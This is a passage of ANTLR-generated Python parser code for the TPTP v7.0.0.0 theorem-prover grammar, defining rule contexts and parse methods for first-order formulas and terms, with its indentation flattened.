self.state = 1088
self.fof_unitary_formula()
self.state = 1093
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,69,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Fof_and_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext,i)
def And(self):
return self.getToken(tptp_v7_0_0_0Parser.And, 0)
def fof_and_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_and_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_and_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_and_formula" ):
listener.enterFof_and_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_and_formula" ):
listener.exitFof_and_formula(self)
def fof_and_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Fof_and_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 190
self.enterRecursionRule(localctx, 190, self.RULE_fof_and_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1095
self.fof_unitary_formula()
self.state = 1096
self.match(tptp_v7_0_0_0Parser.And)
self.state = 1097
self.fof_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 1104
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,70,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Fof_and_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_fof_and_formula)
self.state = 1099
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 1100
self.match(tptp_v7_0_0_0Parser.And)
self.state = 1101
self.fof_unitary_formula()
self.state = 1106
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,70,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Fof_unitary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_quantified_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_quantified_formulaContext,0)
def fof_unary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unary_formulaContext,0)
def fof_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_atomic_formulaContext,0)
def fof_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_logic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_unitary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_unitary_formula" ):
listener.enterFof_unitary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_unitary_formula" ):
listener.exitFof_unitary_formula(self)
def fof_unitary_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_unitary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 192, self.RULE_fof_unitary_formula)
try:
self.state = 1114
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,71,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1107
self.fof_quantified_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1108
self.fof_unary_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1109
self.fof_atomic_formula()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 1110
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1111
self.fof_logic_formula()
self.state = 1112
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_quantified_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_quantifier(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_quantifierContext,0)
def fof_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_variable_listContext,0)
def fof_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_quantified_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_quantified_formula" ):
listener.enterFof_quantified_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_quantified_formula" ):
listener.exitFof_quantified_formula(self)
def fof_quantified_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_quantified_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 194, self.RULE_fof_quantified_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1116
self.fof_quantifier()
self.state = 1117
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1118
self.fof_variable_list()
self.state = 1119
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 1120
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 1121
self.fof_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_variable_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def variable(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.VariableContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_variable_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_variable_list" ):
listener.enterFof_variable_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_variable_list" ):
listener.exitFof_variable_list(self)
def fof_variable_list(self):
localctx = tptp_v7_0_0_0Parser.Fof_variable_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 196, self.RULE_fof_variable_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1123
self.variable()
self.state = 1128
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1124
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1125
self.variable()
self.state = 1130
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_unary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def unary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Unary_connectiveContext,0)
def fof_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_unitary_formulaContext,0)
def fof_infix_unary(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_infix_unaryContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_unary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_unary_formula" ):
listener.enterFof_unary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_unary_formula" ):
listener.exitFof_unary_formula(self)
def fof_unary_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_unary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 198, self.RULE_fof_unary_formula)
try:
self.state = 1135
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Not]:
self.enterOuterAlt(localctx, 1)
self.state = 1131
self.unary_connective()
self.state = 1132
self.fof_unitary_formula()
pass
elif token in [tptp_v7_0_0_0Parser.T__17, tptp_v7_0_0_0Parser.T__18, tptp_v7_0_0_0Parser.T__23, tptp_v7_0_0_0Parser.T__24, tptp_v7_0_0_0Parser.T__25, tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 2)
self.state = 1134
self.fof_infix_unary()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_infix_unaryContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_term(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_termContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,i)
def Infix_inequality(self):
return self.getToken(tptp_v7_0_0_0Parser.Infix_inequality, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_infix_unary
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_infix_unary" ):
listener.enterFof_infix_unary(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_infix_unary" ):
listener.exitFof_infix_unary(self)
def fof_infix_unary(self):
localctx = tptp_v7_0_0_0Parser.Fof_infix_unaryContext(self, self._ctx, self.state)
self.enterRule(localctx, 200, self.RULE_fof_infix_unary)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1137
self.fof_term()
self.state = 1138
self.match(tptp_v7_0_0_0Parser.Infix_inequality)
self.state = 1139
self.fof_term()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_atomic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_plain_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_plain_atomic_formulaContext,0)
def fof_defined_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_atomic_formulaContext,0)
def fof_system_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_system_atomic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_atomic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_atomic_formula" ):
listener.enterFof_atomic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_atomic_formula" ):
listener.exitFof_atomic_formula(self)
def fof_atomic_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_atomic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 202, self.RULE_fof_atomic_formula)
try:
self.state = 1144
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,74,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1141
self.fof_plain_atomic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1142
self.fof_defined_atomic_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1143
self.fof_system_atomic_formula()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_plain_atomic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_plain_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_plain_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_plain_atomic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_plain_atomic_formula" ):
listener.enterFof_plain_atomic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_plain_atomic_formula" ):
listener.exitFof_plain_atomic_formula(self)
def fof_plain_atomic_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_plain_atomic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 204, self.RULE_fof_plain_atomic_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1146
self.fof_plain_term()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_defined_atomic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_defined_plain_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_plain_formulaContext,0)
def fof_defined_infix_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_infix_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_defined_atomic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_defined_atomic_formula" ):
listener.enterFof_defined_atomic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_defined_atomic_formula" ):
listener.exitFof_defined_atomic_formula(self)
def fof_defined_atomic_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_defined_atomic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 206, self.RULE_fof_defined_atomic_formula)
try:
self.state = 1150
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,75,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1148
self.fof_defined_plain_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1149
self.fof_defined_infix_formula()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_defined_plain_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_defined_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_defined_plain_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_defined_plain_formula" ):
listener.enterFof_defined_plain_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_defined_plain_formula" ):
listener.exitFof_defined_plain_formula(self)
def fof_defined_plain_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_defined_plain_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 208, self.RULE_fof_defined_plain_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1152
self.fof_defined_term()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_defined_infix_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_term(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_termContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,i)
def defined_infix_pred(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_infix_predContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_defined_infix_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_defined_infix_formula" ):
listener.enterFof_defined_infix_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_defined_infix_formula" ):
listener.exitFof_defined_infix_formula(self)
def fof_defined_infix_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_defined_infix_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 210, self.RULE_fof_defined_infix_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1154
self.fof_term()
self.state = 1155
self.defined_infix_pred()
self.state = 1156
self.fof_term()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_system_atomic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_system_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_system_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_system_atomic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_system_atomic_formula" ):
listener.enterFof_system_atomic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_system_atomic_formula" ):
listener.exitFof_system_atomic_formula(self)
def fof_system_atomic_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_system_atomic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 212, self.RULE_fof_system_atomic_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1158
self.fof_system_term()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_plain_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.ConstantContext,0)
def functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.FunctorContext,0)
def fof_arguments(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_argumentsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_plain_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_plain_term" ):
listener.enterFof_plain_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_plain_term" ):
listener.exitFof_plain_term(self)
def fof_plain_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_plain_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 214, self.RULE_fof_plain_term)
try:
self.state = 1166
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,76,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1160
self.constant()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1161
self.functor()
self.state = 1162
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1163
self.fof_arguments()
self.state = 1164
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_defined_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def defined_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_termContext,0)
def fof_defined_atomic_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_atomic_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_defined_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_defined_term" ):
listener.enterFof_defined_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_defined_term" ):
listener.exitFof_defined_term(self)
def fof_defined_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_defined_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 216, self.RULE_fof_defined_term)
try:
self.state = 1170
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 1)
self.state = 1168
self.defined_term()
pass
elif token in [tptp_v7_0_0_0Parser.Dollar_word]:
self.enterOuterAlt(localctx, 2)
self.state = 1169
self.fof_defined_atomic_term()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_defined_atomic_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_defined_plain_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_plain_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_defined_atomic_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_defined_atomic_term" ):
listener.enterFof_defined_atomic_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_defined_atomic_term" ):
listener.exitFof_defined_atomic_term(self)
def fof_defined_atomic_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_defined_atomic_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 218, self.RULE_fof_defined_atomic_term)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1172
self.fof_defined_plain_term()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_defined_plain_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def defined_constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_constantContext,0)
def defined_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_functorContext,0)
def fof_arguments(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_argumentsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_defined_plain_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_defined_plain_term" ):
listener.enterFof_defined_plain_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_defined_plain_term" ):
listener.exitFof_defined_plain_term(self)
def fof_defined_plain_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_defined_plain_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 220, self.RULE_fof_defined_plain_term)
try:
self.state = 1180
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,78,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1174
self.defined_constant()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1175
self.defined_functor()
self.state = 1176
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1177
self.fof_arguments()
self.state = 1178
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_system_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def system_constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.System_constantContext,0)
def system_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.System_functorContext,0)
def fof_arguments(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_argumentsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_system_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_system_term" ):
listener.enterFof_system_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_system_term" ):
listener.exitFof_system_term(self)
def fof_system_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_system_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 222, self.RULE_fof_system_term)
try:
self.state = 1188
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,79,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1182
self.system_constant()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1183
self.system_functor()
self.state = 1184
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1185
self.fof_arguments()
self.state = 1186
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_argumentsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_term(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_termContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_arguments
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_arguments" ):
listener.enterFof_arguments(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_arguments" ):
listener.exitFof_arguments(self)
def fof_arguments(self):
localctx = tptp_v7_0_0_0Parser.Fof_argumentsContext(self, self._ctx, self.state)
self.enterRule(localctx, 224, self.RULE_fof_arguments)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1190
self.fof_term()
self.state = 1195
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1191
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1192
self.fof_term()
self.state = 1197
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
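    # fof_term ::= fof_function_term | variable | tff_conditional_term | tff_let_term | tff_tuple_term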
class Fof_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_function_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_function_termContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def tff_conditional_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_conditional_termContext,0)
def tff_let_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_termContext,0)
def tff_tuple_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_tuple_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_term" ):
listener.enterFof_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_term" ):
listener.exitFof_term(self)
def fof_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 226, self.RULE_fof_term)
try:
self.state = 1203
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 1)
self.state = 1198
self.fof_function_term()
pass
elif token in [tptp_v7_0_0_0Parser.Upper_word]:
self.enterOuterAlt(localctx, 2)
self.state = 1199
self.variable()
pass
elif token in [tptp_v7_0_0_0Parser.T__23]:
self.enterOuterAlt(localctx, 3)
self.state = 1200
self.tff_conditional_term()
pass
elif token in [tptp_v7_0_0_0Parser.T__24, tptp_v7_0_0_0Parser.T__25]:
self.enterOuterAlt(localctx, 4)
self.state = 1201
self.tff_let_term()
pass
elif token in [tptp_v7_0_0_0Parser.T__17, tptp_v7_0_0_0Parser.T__18]:
self.enterOuterAlt(localctx, 5)
self.state = 1202
self.tff_tuple_term()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_function_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_plain_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_plain_termContext,0)
